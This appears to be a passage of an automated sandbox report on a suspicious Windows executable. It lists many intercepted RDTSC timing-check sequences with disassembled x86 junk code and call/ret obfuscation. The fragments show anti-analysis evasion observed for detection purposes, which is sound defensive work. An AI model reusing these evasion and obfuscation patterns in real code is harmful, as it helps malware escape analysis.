              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FC82 second address: 104FC98 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAE58F85878h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FAE58F85884h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FC98 second address: 104FC9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10581E7 second address: 10581FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jc 00007FAE58F85876h 0x0000000c pop eax 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FAE58F85876h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058361 second address: 105836E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FAE58F85636h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105836E second address: 105838C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAE58F85888h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10584F9 second address: 1058554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAE58F85647h 0x0000000b jnl 00007FAE58F85636h 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FAE58F85642h 0x00000019 jmp 00007FAE58F85644h 0x0000001e pushad 0x0000001f jo 00007FAE58F85636h 0x00000025 jns 00007FAE58F85636h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10589BE second address: 10589D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FAE58F85878h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059611 second address: 105961D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105961D second address: 1059641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push edx 0x00000014 jnl 00007FAE58F85876h 0x0000001a pop edx 0x0000001b pushad 0x0000001c jnl 00007FAE58F85876h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059641 second address: 1059696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FAE58F85638h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 or dword ptr [ebp+1245B533h], ebx 0x00000027 call 00007FAE58F85639h 0x0000002c pushad 0x0000002d push edi 0x0000002e jmp 00007FAE58F85642h 0x00000033 pop edi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FAE58F8563Bh 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059696 second address: 10596B1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007FAE58F85884h 0x00000012 pushad 0x00000013 jo 00007FAE58F85876h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10596B1 second address: 10596CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push ebx 0x0000000a jnc 00007FAE58F8563Ch 0x00000010 pop ebx 0x00000011 mov eax, dword ptr [eax] 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10596CF second address: 10596D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059C3D second address: 1059C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059D14 second address: 1059D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1059D1A second address: 1059D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A347 second address: 105A396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FAE58F85878h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jl 00007FAE58F85881h 0x00000030 jmp 00007FAE58F8587Bh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A396 second address: 105A3D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAE58F85648h 0x00000008 jmp 00007FAE58F85642h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 ja 00007FAE58F85636h 0x0000001a pop edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A3D1 second address: 105A3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A59E second address: 105A5A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A5A4 second address: 105A5AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A5AA second address: 105A5AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A5AE second address: 105A5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jne 00007FAE58F85876h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A770 second address: 105A774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A826 second address: 105A83D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A83D second address: 105A843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A918 second address: 105A91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A91D second address: 105A922 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A9F9 second address: 105AA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FAE58F85878h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AEFB second address: 105AF21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F8563Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAE58F85642h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105AF21 second address: 105AFA4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FAE58F85889h 0x00000012 je 00007FAE58F85878h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FAE58F85878h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007FAE58F85878h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 stc 0x00000053 push 00000000h 0x00000055 sub dword ptr [ebp+1243CDC8h], ecx 0x0000005b xchg eax, ebx 0x0000005c pushad 0x0000005d pushad 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D48B second address: 105D491 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D491 second address: 105D504 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FAE58F85888h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub esi, dword ptr [ebp+122D37F5h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FAE58F85878h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov si, AF1Eh 0x00000036 mov dword ptr [ebp+122D2780h], edx 0x0000003c xchg eax, ebx 0x0000003d jmp 00007FAE58F85887h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D504 second address: 105D50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAE58F85636h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DF7E second address: 105DF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105C23A second address: 105C23F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DF85 second address: 105DFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FAE58F85884h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FAE58F85876h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DD44 second address: 105DD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DD48 second address: 105DD52 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAE58F8587Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105EAA9 second address: 105EAB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F1B9 second address: 105F1C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FBC8 second address: 105FBCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10638D9 second address: 10638DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10638DD second address: 10638E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10638E1 second address: 1063902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAE58F85888h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1015938 second address: 1015953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85647h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1015953 second address: 101595F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067988 second address: 1067999 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FAE58F85636h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1067999 second address: 1067A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b jmp 00007FAE58F8587Ah 0x00000010 push 00000000h 0x00000012 mov bl, 2Dh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FAE58F85878h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 jnc 00007FAE58F85878h 0x00000038 pushad 0x00000039 jmp 00007FAE58F8587Dh 0x0000003e jmp 00007FAE58F8587Ch 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 push edi 0x00000047 pushad 0x00000048 jo 00007FAE58F85876h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068955 second address: 1068959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065557 second address: 1065572 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FAE58F85876h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pushad 0x00000013 jng 00007FAE58F85876h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B9B0 second address: 106B9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C8C9 second address: 106C8D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAE58F85876h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C8D3 second address: 106C8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C8D7 second address: 106C948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bx, 5E29h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FAE58F85878h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov ebx, esi 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007FAE58F85878h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov edi, 47DBC967h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FAE58F85887h 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068BAE second address: 1068C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F85641h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FAE58F85638h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007FAE58F85638h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 mov dword ptr fs:[00000000h], esp 0x0000004f movsx edi, si 0x00000052 mov eax, dword ptr [ebp+122D0185h] 0x00000058 jns 00007FAE58F8563Ah 0x0000005e push FFFFFFFFh 0x00000060 mov dword ptr [ebp+1243F6C8h], edi 0x00000066 nop 0x00000067 push ebx 0x00000068 pushad 0x00000069 jl 00007FAE58F85636h 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106FBB2 second address: 106FBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1072A7E second address: 1072A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074C92 second address: 1074CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAE58F85886h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ED25 second address: 106ED57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FAE58F8564Dh 0x00000013 jmp 00007FAE58F85647h 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007FAE58F85636h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106EE06 second address: 106EE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070C39 second address: 1070C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070C3E second address: 1070C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FAE58F85876h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070C48 second address: 1070C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071CC8 second address: 1071CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1071CD5 second address: 1071CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAE58F8563Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DDB second address: 1073DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DE0 second address: 1073DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DE6 second address: 1073DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1073DEA second address: 1073DFD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAE58F85636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074E89 second address: 1074E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107B3FF second address: 107B404 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F5F6 second address: 107F5FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107ECC0 second address: 107ECC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C7F second address: 1083C89 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAE58F85876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083C89 second address: 1083CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAE58F8563Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007FAE58F8563Dh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083CB6 second address: 1083CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAE58F85876h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAE58F8587Dh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083CD3 second address: 1083CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAE58F85649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e ja 00007FAE58F8563Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083FA7 second address: 1083FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108A7E1 second address: 108A7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
